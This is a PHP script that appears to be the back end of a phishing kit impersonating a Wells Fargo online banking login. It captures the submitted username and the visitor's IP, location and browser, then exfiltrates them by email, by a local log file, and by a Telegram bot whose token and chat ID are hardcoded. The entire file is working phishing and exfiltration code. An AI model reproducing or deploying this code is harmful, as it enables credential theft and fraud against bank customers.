<?php
 


/*   
 


     By @Owtoya50

  
*/
	
	

 ob_start();
	include 'frifayr.php';
	$x = "Owtoya";
ini_set("output_buffering",4096);
session_start();
ob_start();

include 'Email.php';
$_SESSION['username'] = $_POST['username'];
$random=rand(0,100000000000);
$md5=md5("$random");
$base=base64_encode($md5);
$host=md5("$base");


$user_ip = getUserIP();
$ip = getUserIP();
$city = file_get_contents("https://ipapi.co/$ip/city/" );
$zip = file_get_contents("https://ipapi.co/$ip/postal/" );
$zip = file_get_contents("https://ipapi.co/$ip/region/" );
$browser = getBrowser();


$_SESSION['username'] = $_POST['username'];
$ip = getenv("REMOTE_ADDR");
$message .= "$ip \n";
$message .= "$city \n";
$message .= "$zip \n";
$message .= "$browser \n";


$headers = "From: WElls online  <mail@wsfonmail.com>";
$subject = " WElls online - $ip";


mail($SEND,$subject,$ip,$headers,$message);
$file = fopen("log-Owtoya.txt", 'a');
fwrite($file, $message);
$token = "5991494519:AAEJ8mhC5-aNIB8-I-Lu-gpbpu1eXW5TsGY";
$data = [
    'text' => $message,
    'chat_id' => '1085206701'
];

file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
session_destroy();

  	
	?>